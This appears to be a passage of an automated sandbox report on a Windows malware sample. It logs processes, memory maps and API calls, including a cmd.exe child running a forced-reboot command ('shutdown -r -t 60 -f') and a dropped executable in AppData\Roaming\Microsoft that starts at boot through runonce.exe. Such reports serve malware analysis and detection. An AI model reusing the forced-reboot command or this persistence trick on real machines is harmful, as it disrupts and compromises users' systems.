Parent PID 0xef8 (c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 344
0x 7C8
0x EB0
0x ED0
0x EF0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
wmic.exe 0x00070000 0x000d3fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000560000 0x00560000 0x0455ffff Pagefile Backed Memory - True False False -
private_0x0000000004560000 0x04560000 0x0457ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004560000 0x04560000 0x0456ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004570000 0x04570000 0x04573fff Private Memory Readable, Writable True False False -
private_0x0000000004580000 0x04580000 0x04581fff Private Memory Readable, Writable True False False -
pagefile_0x0000000004580000 0x04580000 0x04580fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004590000 0x04590000 0x045a3fff Pagefile Backed Memory Readable True False False -
private_0x00000000045b0000 0x045b0000 0x045effff Private Memory Readable, Writable True False False -
private_0x00000000045f0000 0x045f0000 0x0462ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004630000 0x04630000 0x04633fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004640000 0x04640000 0x04640fff Pagefile Backed Memory Readable True False False -
private_0x0000000004650000 0x04650000 0x04651fff Private Memory Readable, Writable True False False -
private_0x0000000004660000 0x04660000 0x0469ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000046a0000 0x046a0000 0x046a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000046b0000 0x046b0000 0x046b3fff Private Memory Readable, Writable True False False -
private_0x00000000046c0000 0x046c0000 0x047bffff Private Memory Readable, Writable True False False -
msxml3r.dll 0x047c0000 0x047c0fff Memory Mapped File Readable False False False -
wmic.exe.mui 0x047d0000 0x047dffff Memory Mapped File Readable False False False -
private_0x00000000047e0000 0x047e0000 0x047effff Private Memory Readable, Writable True False False -
locale.nls 0x047f0000 0x048adfff Memory Mapped File Readable False False False -
private_0x00000000048b0000 0x048b0000 0x048effff Private Memory Readable, Writable True False False -
private_0x00000000048f0000 0x048f0000 0x0493ffff Private Memory Readable, Writable True False False -
private_0x00000000048f0000 0x048f0000 0x0490ffff Private Memory - True False False -
private_0x0000000004910000 0x04910000 0x04910fff Private Memory Readable, Writable True False False -
private_0x0000000004920000 0x04920000 0x04920fff Private Memory Readable, Writable True False False -
private_0x0000000004930000 0x04930000 0x0493ffff Private Memory Readable, Writable True False False -
imm32.dll 0x04940000 0x04969fff Memory Mapped File Readable False False False -
pagefile_0x0000000004940000 0x04940000 0x04940fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004940000 0x04940000 0x04943fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000004950000 0x04950000 0x0495cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x04950000 0x04954fff Memory Mapped File Readable False False False -
private_0x0000000004970000 0x04970000 0x0497ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x04980000 0x04cb6fff Memory Mapped File Readable False False False -
ole32.dll 0x04cc0000 0x04da8fff Memory Mapped File Readable False False False -
private_0x0000000004cc0000 0x04cc0000 0x04e7ffff Private Memory Readable, Writable True False False -
private_0x0000000004cc0000 0x04cc0000 0x04e0ffff Private Memory Readable, Writable True False False -
private_0x0000000004cc0000 0x04cc0000 0x04dcffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x04cc0000 0x04d9efff Memory Mapped File Readable False False False -
private_0x0000000004dc0000 0x04dc0000 0x04dcffff Private Memory Readable, Writable True False False -
private_0x0000000004e00000 0x04e00000 0x04e0ffff Private Memory Readable, Writable True False False -
private_0x0000000004e10000 0x04e10000 0x04e4ffff Private Memory Readable, Writable True False False -
private_0x0000000004e70000 0x04e70000 0x04e7ffff Private Memory Readable, Writable True False False -
private_0x0000000004e80000 0x04e80000 0x04feffff Private Memory Readable, Writable True False False -
private_0x0000000004e80000 0x04e80000 0x04fbffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004e80000 0x04e80000 0x04f37fff Pagefile Backed Memory Readable True False False -
private_0x0000000004f40000 0x04f40000 0x04f7ffff Private Memory Readable, Writable True False False -
private_0x0000000004fb0000 0x04fb0000 0x04fbffff Private Memory Readable, Writable True False False -
private_0x0000000004fe0000 0x04fe0000 0x04feffff Private Memory Readable, Writable True False False -
private_0x0000000004ff0000 0x04ff0000 0x053effff Private Memory Readable, Writable True False False -
pagefile_0x00000000053f0000 0x053f0000 0x05577fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005580000 0x05580000 0x05700fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005710000 0x05710000 0x06b0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000006b10000 0x06b10000 0x06c0ffff Private Memory Readable, Writable True False False -
private_0x0000000006c10000 0x06c10000 0x06c4ffff Private Memory Readable, Writable True False False -
private_0x0000000006c50000 0x06c50000 0x06c8ffff Private Memory Readable, Writable True False False -
private_0x0000000006c90000 0x06c90000 0x06ccffff Private Memory Readable, Writable True False False -
private_0x0000000006cd0000 0x06cd0000 0x06d0ffff Private Memory Readable, Writable True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x73c10000 0x73d9ffff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73da0000 0x73e05fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x73e10000 0x73e1cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x742e0000 0x74503fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74510000 0x74517fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74520000 0x7454ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x745a0000 0x74860fff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x74870000 0x7488afff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x748d0000 0x748edfff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x74910000 0x749cbfff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x749d0000 0x749e0fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x749f0000 0x74a1efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74a20000 0x74a32fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x74a40000 0x74b9ffff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ba0000 0x74bbcfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74bc0000 0x74c34fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75080000 0x750c3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x76f60000 0x76f6bfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x76f70000 0x7708ffff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x77090000 0x77249fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x77430000 0x77519fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x775e0000 0x7760afff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x77760000 0x777e1fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x778a0000 0x7792cfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x77930000 0x7798bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77990000 0x77a0afff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77ad0000 0x77ad6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x77ba0000 0x77c31fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ea3a000 0x7ea3a000 0x7ea3cfff Private Memory Readable, Writable True False False -
private_0x000000007ea3d000 0x7ea3d000 0x7ea3ffff Private Memory Readable, Writable True False False -
pagefile_0x000000007ea40000 0x7ea40000 0x7eb3ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007eb40000 0x7eb40000 0x7eb62fff Pagefile Backed Memory Readable True False False -
private_0x000000007eb65000 0x7eb65000 0x7eb65fff Private Memory Readable, Writable True False False -
private_0x000000007eb66000 0x7eb66000 0x7eb68fff Private Memory Readable, Writable True False False -
private_0x000000007eb69000 0x7eb69000 0x7eb6bfff Private Memory Readable, Writable True False False -
private_0x000000007eb6c000 0x7eb6c000 0x7eb6efff Private Memory Readable, Writable True False False -
private_0x000000007eb6f000 0x7eb6f000 0x7eb6ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0x344
16 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x70000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-05-22 18:13:21 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #10: cmd.exe
55 0
»
Information Value
ID #10
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:02:00, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:02:36
OS Process Information
»
Information Value
PID 0xd44
Parent PID 0xef8 (c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x D34
0x E48
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
cmd.exe 0x00a00000 0x00a4ffff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000eb0000 0x00eb0000 0x04eaffff Pagefile Backed Memory - True False False -
private_0x0000000004eb0000 0x04eb0000 0x04ecffff Private Memory Readable, Writable True False False -
pagefile_0x0000000004eb0000 0x04eb0000 0x04ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000004ec0000 0x04ec0000 0x04ec3fff Private Memory Readable, Writable True False False -
private_0x0000000004ed0000 0x04ed0000 0x04ed1fff Private Memory Readable, Writable True False False -
private_0x0000000004ed0000 0x04ed0000 0x04ed3fff Private Memory Readable, Writable True False False -
pagefile_0x0000000004ee0000 0x04ee0000 0x04ef3fff Pagefile Backed Memory Readable True False False -
private_0x0000000004f00000 0x04f00000 0x04f3ffff Private Memory Readable, Writable True False False -
private_0x0000000004f40000 0x04f40000 0x0503ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000005040000 0x05040000 0x05043fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000005050000 0x05050000 0x05050fff Pagefile Backed Memory Readable True False False -
private_0x0000000005060000 0x05060000 0x05061fff Private Memory Readable, Writable True False False -
locale.nls 0x05070000 0x0512dfff Memory Mapped File Readable False False False -
private_0x0000000005130000 0x05130000 0x0516ffff Private Memory Readable, Writable True False False -
private_0x00000000051e0000 0x051e0000 0x051effff Private Memory Readable, Writable True False False -
private_0x0000000005200000 0x05200000 0x0520ffff Private Memory Readable, Writable True False False -
private_0x0000000005210000 0x05210000 0x0530ffff Private Memory Readable, Writable True False False -
private_0x00000000053e0000 0x053e0000 0x054dffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x054e0000 0x05816fff Memory Mapped File Readable False False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007ecf0000 0x7ecf0000 0x7edeffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007edf0000 0x7edf0000 0x7ee12fff Pagefile Backed Memory Readable True False False -
private_0x000000007ee16000 0x7ee16000 0x7ee18fff Private Memory Readable, Writable True False False -
private_0x000000007ee19000 0x7ee19000 0x7ee19fff Private Memory Readable, Writable True False False -
private_0x000000007ee1c000 0x7ee1c000 0x7ee1efff Private Memory Readable, Writable True False False -
private_0x000000007ee1f000 0x7ee1f000 0x7ee1ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Threads
Thread 0xd34
55 0
»
Category Operation Information Success Count Logfile
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0xa00000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x776b2780 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 104, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\CIiHmnxMn6Ps\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x7768fa80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7768a790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76a835c0 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\shutdown.exe, os_pid = 0xe58, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #12: shutdown.exe
0 0
»
Information Value
ID #12
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\CIiHmnxMn6Ps\Desktop\
Monitor Start Time: 00:02:04, Reason: Child Process
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:02:32
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0xe58
Parent PID 0xd44 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x E60
0x E5C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000400000 0x00400000 0x0041ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000400000 0x00400000 0x0040ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000410000 0x00410000 0x00413fff Private Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x00421fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000430000 0x00430000 0x00443fff Pagefile Backed Memory Readable True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004d0000 0x004d0000 0x004d3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x004e0fff Pagefile Backed Memory Readable True False False -
private_0x00000000004f0000 0x004f0000 0x004f1fff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0060ffff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0062ffff Private Memory Readable, Writable True False False -
locale.nls 0x00630000 0x006edfff Memory Mapped File Readable False False False -
private_0x00000000006f0000 0x006f0000 0x0072ffff Private Memory Readable, Writable True False False -
private_0x0000000000730000 0x00730000 0x0076ffff Private Memory Readable, Writable True False False -
private_0x00000000008a0000 0x008a0000 0x008affff Private Memory Readable, Writable True False False -
shutdown.exe 0x00f60000 0x00f6afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000f70000 0x00f70000 0x04f6ffff Pagefile Backed Memory - True False False -
wow64.dll 0x59300000 0x5934efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x59350000 0x59357fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x59360000 0x593d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74ce0000 0x74d38fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74d40000 0x74d49fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74d50000 0x74d6dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x74d70000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76970000 0x76ae5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76ca0000 0x76decfff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x77090000 0x77249fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x77250000 0x77292fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x77430000 0x77519fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x77670000 0x7775ffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77990000 0x77a0afff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x77a10000 0x77acdfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x77af0000 0x77b9bfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77c40000 0x77db8fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007ed40000 0x7ed40000 0x7ee3ffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ee40000 0x7ee40000 0x7ee62fff Pagefile Backed Memory Readable True False False -
private_0x000000007ee68000 0x7ee68000 0x7ee6afff Private Memory Readable, Writable True False False -
private_0x000000007ee6b000 0x7ee6b000 0x7ee6dfff Private Memory Readable, Writable True False False -
private_0x000000007ee6e000 0x7ee6e000 0x7ee6efff Private Memory Readable, Writable True False False -
private_0x000000007ee6f000 0x7ee6f000 0x7ee6ffff Private Memory Readable, Writable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7dfc03e6ffff Private Memory Readable True False False -
pagefile_0x00007dfc03e70000 0x7dfc03e70000 0x7ffc03e6ffff Pagefile Backed Memory - True False False -
ntdll.dll 0x7ffc03e70000 0x7ffc04031fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffc04032000 0x7ffc04032000 0x7ffffffeffff Private Memory Readable True False False -
Process #18: tlgmea.exe
1187 31
»
Information Value
ID #18
File Name c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe
Command Line "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe"
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:04:18, Reason: Autostart
Unmonitor End Time: 00:04:36, Reason: Terminated by Timeout
Monitor Duration 00:00:18
OS Process Information
»
Information Value
PID 0x8e8
Parent PID 0x868 (c:\windows\syswow64\runonce.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 8EC
0x 8F4
0x 908
0x 944
0x 980
0x 984
0x 98C
0x B90
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00023fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
